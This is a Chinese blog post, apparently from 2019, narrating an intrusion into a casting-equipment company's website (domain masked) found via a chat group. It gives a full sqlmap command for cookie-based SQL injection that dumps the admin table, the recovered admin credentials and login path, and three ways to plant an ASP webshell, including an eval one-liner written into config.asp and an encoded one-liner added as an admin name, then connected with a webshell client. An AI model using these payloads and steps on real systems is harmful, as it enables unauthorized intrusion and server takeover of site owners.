[渗透实战]某铸造设备公司官网经典思路

这个网站是微信漏洞挖掘公开课群里的一位群友发出来的,空闲时看了看,不是很难,但是我觉得有一定的参考价值,算是比较经典的一种吧!

*声明:只做技术分享,后续已去除shell的文件!请相关公司做好及时的修复!看到这篇文章的大佬,也别去折腾了,思路本文已经分享,自重

微信群友发来这样的消息:

[图片已删除]

从这样的消息看出来,已经知道 editor 编辑器,可以确定发问者已经进入网站的后台了,所以这样的网站应该比较好拿下。

得知这个问题后,就分享到团队内部,大家有空的就可以看看,练练手。

0x01 SQL注入:

当我们访问主站的时候,随便加上参数,发现存在防止SQL注入的程序存在,影响了我们的注入。

当我们浏览器选择移动终端的模拟情况下,访问会跳转到手机的一个域名 m.xxxx.com ,这样的网站就是一个手机域名的,但是是一个和PC公用一个后台的网站程序。

移动端

对于子站的防护一般不强,选择了手机网站程序入手,加上' 发现还是会被程序拦截,想到 asp 程序的接受参数用的 request 语句,可以接受 postgetcookie的参数,因此,我们尝试 cookie注入

这里简单测试发现存在注入,可以写脚本的方式测试,但是为了简单,直接使用 Sqlmap 神器

存在注入

SQL injection

再来这样一句:

python sqlmap/sqlmap.py -u "http://m.xxxx.com/ProductShow.asp" --cookie "id=325" --batch --dbs --level 2 -T admin -C "id,username,password" --first 1 --dump

Got important information

得到管理员账号:admin

解密得到管理员密码:admin6830

0x02 进入后台:

后台地址:域名/manage/login.asp

登录后台

 

进去后浏览器选择 兼容模式

0x03 获取Shell:

有三种方式,不详细展示:

1.编辑器其实是 kindeditor ,这个编辑器除了一个XSS漏洞就没什么了,这里选择上传一张带有小马的照片,然后在备份文件中,备份这个文件为 一个 a.asp 的格式备份文件,但会显示备份文件 xxxx/a.asp.asa 成功,其实并没有asa的文件后缀,所以直接连接你的小马就行了。

2.网站配置文件是写配置文件的形式,保存的文件为./Inc/config.asp,保存配置文件的小马推荐一个:

"%><%Y=request("x")%><%eval(Y)%><%'

3.在管理员管理处,添加管理员处,添加编码后的一句话:

┼攠數畣整爠煥敵瑳∨≡┩愾
密码:a

然后备份文件,只需要修改备份后的文件后缀为 asp,也会遇上 asp.asa 的回显,去掉 .asa 即可菜刀连接

0x04 总结:

Getshell

经典的东西,分享之~

posted @ 2019-11-24 00:20  M0rta1s  阅读(285)  评论(0编辑  收藏  举报